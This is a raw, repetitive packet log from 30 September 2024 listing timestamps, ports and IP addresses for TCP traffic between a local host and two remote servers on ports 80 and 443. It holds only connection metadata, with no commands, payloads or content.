                                                                                                                        Sep 30, 2024 15:00:16.395503998 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.395503998 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.395530939 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.395543098 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.395644903 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.395656109 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.395687103 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.395697117 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.398711920 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.398724079 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.398736000 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.398747921 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.398772001 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.398791075 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.398864985 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.398875952 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.398905039 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.398921013 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.402045012 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.405469894 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.405520916 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.405651093 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.405661106 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.405672073 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.405683994 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.405697107 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.405714035 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.405741930 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.405818939 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.405832052 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.405859947 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.405879974 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.405958891 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.406003952 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.406150103 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.406161070 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.406189919 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.406325102 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.406344891 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.406358957 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.406368971 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.406368971 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.406385899 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.406387091 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.406405926 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.406430006 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.406665087 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.406676054 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.406687975 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.406697989 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.406709909 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.406713009 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.406724930 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.406730890 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.406749964 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.406768084 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.406810045 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.406820059 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.406831980 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.406850100 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.406853914 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.406862974 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.406873941 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.406889915 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.406907082 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.407349110 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.407360077 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.407371044 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.407388926 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.407402992 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.407402992 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.407403946 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.407418966 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.407437086 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.407495975 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.407509089 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.407522917 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.407533884 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.407536983 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.407546043 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.407547951 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.407557011 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.407568932 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.407582998 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.407787085 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.407799006 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.407812119 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.407823086 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.407830000 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.407835007 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.407840014 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.407855034 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.407860041 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.407869101 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.407874107 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.407880068 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.407883883 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.407892942 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.407902956 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.407903910 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.407912970 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.407915115 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.407934904 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.407938004 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.407948017 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.407948017 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.407960892 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.407967091 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.407980919 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.407990932 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.408032894 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.409471035 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.409483910 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.409496069 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.409501076 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.409511089 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.409570932 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.409616947 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.409663916 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.409663916 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.483659029 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.483692884 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.483705997 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.483726025 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.483737946 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.483742952 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.483751059 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.483762980 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.483769894 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.483769894 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.483791113 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.483798027 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.483911991 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.483925104 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.483937025 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.483949900 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.483962059 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.483963013 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.483983040 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.483994961 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.484066963 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.484148026 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.484160900 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.484178066 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.484189987 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.484198093 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.484201908 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.484214067 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.484225035 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.484232903 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.487210989 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.487221956 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.487232924 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.487255096 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.487261057 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.487267971 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.487268925 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.487278938 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.487284899 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.487303972 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.487309933 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.487319946 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.487332106 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.487344027 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.487354040 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.487359047 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.487377882 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.487392902 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.494101048 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.494118929 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.494131088 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.494148016 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.494162083 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.494168043 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.494191885 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.494205952 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.494210958 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.494210958 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.494216919 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.494227886 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.494242907 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.494246006 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.494259119 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.494262934 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.494270086 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.494276047 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.494282007 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.494294882 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.494304895 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.494307041 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.494321108 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.494332075 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.494472027 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.494551897 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.494599104 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.494641066 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.494659901 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.494673014 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.494684935 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.494687080 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.494698048 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.494700909 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.494709015 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.494714975 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.494721889 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.494723082 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.494734049 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.494741917 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.494745016 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.494760990 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.494766951 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.494786024 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.495093107 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.495105028 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.495119095 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.495145082 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.495160103 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.495171070 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.495182037 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.495187044 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.495188951 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.495188951 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.495193005 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.495215893 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.495234013 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.495253086 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.495255947 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.495265961 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.495270967 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.495279074 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.495284081 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.495304108 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.495311975 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.495847940 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.495861053 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.495872974 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.495894909 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.495896101 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.495909929 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.495910883 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.495924950 CEST804917191.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:16.495929956 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.495945930 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:16.495960951 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:17.222932100 CEST4917180192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:20.916791916 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:20.916858912 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:20.916894913 CEST804916991.134.96.177192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:20.916938066 CEST4916980192.168.2.2291.134.96.177
                                                                                                                        Sep 30, 2024 15:00:21.028383970 CEST49172443192.168.2.22185.199.109.133
                                                                                                                        Sep 30, 2024 15:00:21.028466940 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:21.028536081 CEST49172443192.168.2.22185.199.109.133
                                                                                                                        Sep 30, 2024 15:00:21.202027082 CEST49172443192.168.2.22185.199.109.133
                                                                                                                        Sep 30, 2024 15:00:21.202085018 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:21.659859896 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:21.659967899 CEST49172443192.168.2.22185.199.109.133
                                                                                                                        Sep 30, 2024 15:00:21.771055937 CEST49172443192.168.2.22185.199.109.133
                                                                                                                        Sep 30, 2024 15:00:21.771112919 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:21.771435976 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:21.898338079 CEST49172443192.168.2.22185.199.109.133
                                                                                                                        Sep 30, 2024 15:00:21.939436913 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.074943066 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.074995995 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.075040102 CEST49172443192.168.2.22185.199.109.133
                                                                                                                        Sep 30, 2024 15:00:22.075064898 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.075119019 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.075155973 CEST49172443192.168.2.22185.199.109.133
                                                                                                                        Sep 30, 2024 15:00:22.075162888 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.082655907 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.082688093 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.082706928 CEST49172443192.168.2.22185.199.109.133
                                                                                                                        Sep 30, 2024 15:00:22.082726955 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.082772970 CEST49172443192.168.2.22185.199.109.133
                                                                                                                        Sep 30, 2024 15:00:22.082776070 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.082787991 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.082825899 CEST49172443192.168.2.22185.199.109.133
                                                                                                                        Sep 30, 2024 15:00:22.082839966 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.090356112 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.090401888 CEST49172443192.168.2.22185.199.109.133
                                                                                                                        Sep 30, 2024 15:00:22.090416908 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.162333012 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.162370920 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.162395954 CEST49172443192.168.2.22185.199.109.133
                                                                                                                        Sep 30, 2024 15:00:22.162417889 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.162467957 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.162516117 CEST49172443192.168.2.22185.199.109.133
                                                                                                                        Sep 30, 2024 15:00:22.162519932 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.162565947 CEST49172443192.168.2.22185.199.109.133
                                                                                                                        Sep 30, 2024 15:00:22.162584066 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.163041115 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.163098097 CEST49172443192.168.2.22185.199.109.133
                                                                                                                        Sep 30, 2024 15:00:22.163124084 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.163727999 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.163767099 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.163774014 CEST49172443192.168.2.22185.199.109.133
                                                                                                                        Sep 30, 2024 15:00:22.163815022 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.163867950 CEST49172443192.168.2.22185.199.109.133
                                                                                                                        Sep 30, 2024 15:00:22.164202929 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.170878887 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.170943022 CEST49172443192.168.2.22185.199.109.133
                                                                                                                        Sep 30, 2024 15:00:22.170995951 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.171212912 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.171252966 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.171268940 CEST49172443192.168.2.22185.199.109.133
                                                                                                                        Sep 30, 2024 15:00:22.171289921 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.171334982 CEST49172443192.168.2.22185.199.109.133
                                                                                                                        Sep 30, 2024 15:00:22.171335936 CEST44349172185.199.109.133192.168.2.22
                                                                                                                        Sep 30, 2024 15:00:22.171350002 CEST44349172185.199.109.133192.168.2.22
